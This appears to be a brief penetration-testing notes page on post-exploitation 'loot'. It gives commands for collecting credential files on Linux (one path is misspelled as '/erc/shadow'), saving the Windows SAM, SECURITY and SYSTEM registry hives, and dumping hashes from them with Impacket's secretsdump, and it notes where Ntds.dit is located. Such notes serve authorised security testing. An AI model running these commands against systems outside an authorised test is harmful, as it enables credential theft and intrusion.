Loot
Once we are
root
or NT AUTHORITY\SYSTEM
it's time to collect some loot. 🤑🤑🤑Collect files on target
/etc/passwd
/erc/shadow
Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then crack them using Impackets' secretsdump
secretsdump.py -sam sam -security security -system system LOCAL
By default, the
Ntds.dit
file is located in %SystemRoot%\NTDS\Ntds.dit
of a domain controller.TODO (see /13-misc/impacket.md)
Last modified 1yr ago